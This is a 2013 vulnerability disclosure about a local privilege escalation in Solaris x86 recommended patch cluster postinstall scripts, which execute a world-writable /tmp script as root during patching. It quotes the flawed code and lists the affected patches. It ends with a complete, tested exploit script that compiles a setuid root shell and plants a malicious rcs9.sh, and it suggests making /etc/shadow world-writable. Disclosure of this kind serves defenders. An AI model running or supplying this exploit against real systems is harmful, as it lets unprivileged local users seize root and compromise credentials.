Solaris Recommended Patch Cluster 6/19 local root on x86

Larry W. Cashdollar
7/3/2013
@_larry0

If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.

Local root:

Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.

./144751-01/SUNWos86r/install/postinstall 


   782          if [ -s /tmp/disketterc.d/rcs9.sh ]
   783          then
   784                  /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
   785          fi

Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?

   804  # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)
   805  TMPFILE=/tmp/ncrstmp
   806  sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFILE
   807  cp $TMPFILE ${BASEDIR}/etc/driver_aliases

./141445-09/SUNWos86r/install/postinstall

   656          if [ -s /tmp/disketterc.d/rcs9.sh ]
   657          then
   658                  /sbin/sh /tmp/disketterc.d/rcs9.sh "post"
   659          fi

Well, it looks like you've got a few chances to abuse it:

larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;
./144501-19/SUNWos86r/install/postinstall
./141445-09/SUNWos86r/install/postinstall
./142059-01/SUNWos86r/install/postinstall
./147148-26/SUNWos86r/install/postinstall
./127128-11/SUNWos86r/install/postinstall
./148889-03/SUNWos86r/install/postinstall
./142910-17/SUNWos86r/install/postinstall
./144751-01/SUNWos86r/install/postinstall

Psuedo PoC:

Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.

According to the code if the file exists, it's just executed. Easy.
chmod 666 /etc/shadow would be easy.

Exploit:

#!/bin/sh
#Larry W. Cashdollar, local root for Solaris x86 during patching
#10/4/2013 Tested on Cluster 9/30/2013
# larry@s0l4r1s:~$ ./disk_exp.sh 
# [+] Creating evil shell
# [+] Hope you've got gcc on here, compiling...
# [+] Waiting for root shell
# [+] Tada!
# # id
# uid=0(root) gid=0(root)


echo "[+] Creating evil shell"

cat << EOF > r00t.c
#include <stdio.h>
#include <unistd.h>
int
main (void)
{
  char *shell[2];
  shell[0] = "sh";
  shell[1] = NULL;
  setreuid (0, 0);
  setregid (0, 0);
  execve ("/bin/sh", shell, NULL);
  return(0);
}
EOF

echo "[+] Hope you've got gcc on here, compiling..."

gcc r00t.c -o /tmp/r00t

mkdir -p /tmp/diskette_rc.d/

echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh
echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh
chmod +x /tmp/diskette_rc.d/rcs9.sh
echo "[+] Waiting for root shell"

until [  -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t